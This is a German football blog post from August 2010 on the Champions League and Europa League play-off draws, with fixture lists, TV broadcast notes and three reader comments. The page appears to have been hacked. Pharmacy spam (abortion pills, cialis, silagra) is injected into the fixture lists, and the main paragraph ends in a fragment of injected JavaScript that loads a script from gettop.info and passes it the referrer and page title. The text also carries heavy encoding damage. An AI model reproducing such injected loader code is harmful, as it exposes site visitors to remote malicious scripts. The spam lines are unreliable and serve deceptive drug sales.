Willkommen auf » Play-off Auslosung CL und EL 2010/11
6. Aug 2010

Play-off Auslosung CL und EL 2010/11

Die neue Saison kA?ndigt sich auch in Form von Auslosungen der ersten Runden der internationalen Wettbewerbe an.

cheap pills Champions League Play-off 2010/11

Pills buy abortion pills online uk Werder Bremen a�� Sampdoria Genua
Red Bull Salzburg a�� Hapoel Tel Aviv
Rosenborg Trondheim a�� FC Kopenhagen
FC Basel a�� FC Sheriff
Sparta Prag a�� MSK Zilina
Partizan Belgrad a�� RSC Anderlecht
Young Boys Bern a�� Tottenham Hotspur
Sporting Braga a�� FC Sevilla
Zenit St. Petersburg a�� AJ Auxerre
Dynamo Kiew a�� Ajax Amsterdam

Ach, A�rgerlich, Werder Bremen trifft als gesetztes Team auf den wohl schwersten Gegner Sampdoria Genua, mA�glich wA�ren auch Kiew, Braga, Bern und Auxerre gewesen. Die Italiener sind als Vorjahresvierter der Serie A nicht zu unterschA�tzen, in ihren Reihen haben sie u.a. die Nationalspieler Antonio Cassano, Giampaolo Pazzini und Angelo Palombo. Aber was solls, Bremen ist der Favorit und sollte diese HA?rde meistern kA�nnen.
Gespielt wird am 17./18. (Hinspiel) und 24./25.August (RA?ckspiel). Da die Zentralvermarktung der UEFA-CL bereits in den Play-offs einsetzt, A?bertrA�gt SAT.1 beide Werder-Spiele im FreeTV.
Die Verlierer der Play-offs „steigen in die Europa League ab“.

Europa League Play-off 2010/11

die deutschen Begegnungen…
Borussia Dortmund – FK Qarabag Agdam (Dritter der aserbaidschanischen Liga)
Slovan Bratislava (slowakischer Pokalsieger) – VfB Stuttgart Cheap Buy
order silagra vs suhagra Bayer 04 Leverkusen Buy Order – Tawrija Simferopol (ukrainischer Pokalsieger)

Gespielt wird am 19. (Hinspiel) und 26. August (RA?ckspiel). In den EL-Play-offs greift noch keine Zentralvermarktung, die TV-A?bertragungen bei deutschen Sendern werden daher separat in den kommenden Tagen/Wochen ausgehandelt, Kandidaten sind Sat.1, Sport1, ZDF und Eurosport, evtl. auch WDR und SWR. Leider machen die Gegner nicht besonders viel her, gut fA?r die Klubs (ein Scheitern wA�re ohne Wenn und Aber blamabel), schlecht fA?r die Fans, denn dass alle sechs Spiele mit deutscher Beteiligung A?bertragen werden darf bezweifelt werden. Nach Aserbaidschan und in die Ukraine reist ein deutsches TV-Team (z.B. nach einem A?berzeugenden Sieg im Hinspiel) sicherlich nicht so ohne weiteres.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; purchase panmycin drops Purchase http://creacionesmolina.com/uncategorized/cheap-noroxin-merck/ cialis daily reviews http://www.ipem221jovita.com.ar/cheap-coumadin-diet/


3 Kommentare



  1. Die ersten Informationen zu den TV-Übertragungen der deutschen Europa League Spiele trudeln nun so langsam ein…
    Für den 19.8. sind folgende beiden Hinspiele bestätigt:
    18:30 Bayer 04 Leverkusen – Tavriya Simferopol bei Sport1
    21:05 Borussia Dortmund – FK Qarabag Agdam im ZDF
    Der VfB taucht bisher leider noch nirgends auf.
    Die Rückspiele am 26.8. sind alle noch nicht fest. Lediglich der Anpfiff des Dortmund-Spiels um 18:00 scheint sicher.



  2. Endlich, zwei Tage vor dem EL-Qualispielen hat sich nun auch ein deutscher Sender für die Begegnung Bratislava-Stuttgart gefunden, ab 18:45 überträgt Eurosport im deutschen FreeTV (Kommentator ist Marco Hagemann).
    Es sind also alle versorgt :)



  3. Ein Update noch:
    von den heutigen Rückspielen gibts leider nicht viel zu sehen, lediglich VfB Stuttgart – Slovan Bratislava hat es ins deutsche FreeTV geschafft (Übertragung ab 20:00 bei Sport1)

Einen Kommentar schreiben